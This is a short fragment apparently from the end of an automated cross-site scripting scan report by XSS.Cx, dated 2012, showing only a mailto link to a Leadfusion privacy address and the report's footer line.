<a href="mailto:privacy@leadfusion.com">privacy@Leadfusion.com</a>
...[SNIP]...

Report generated by XSS.Cx at Mon Jan 23 13:35:32 CST 2012.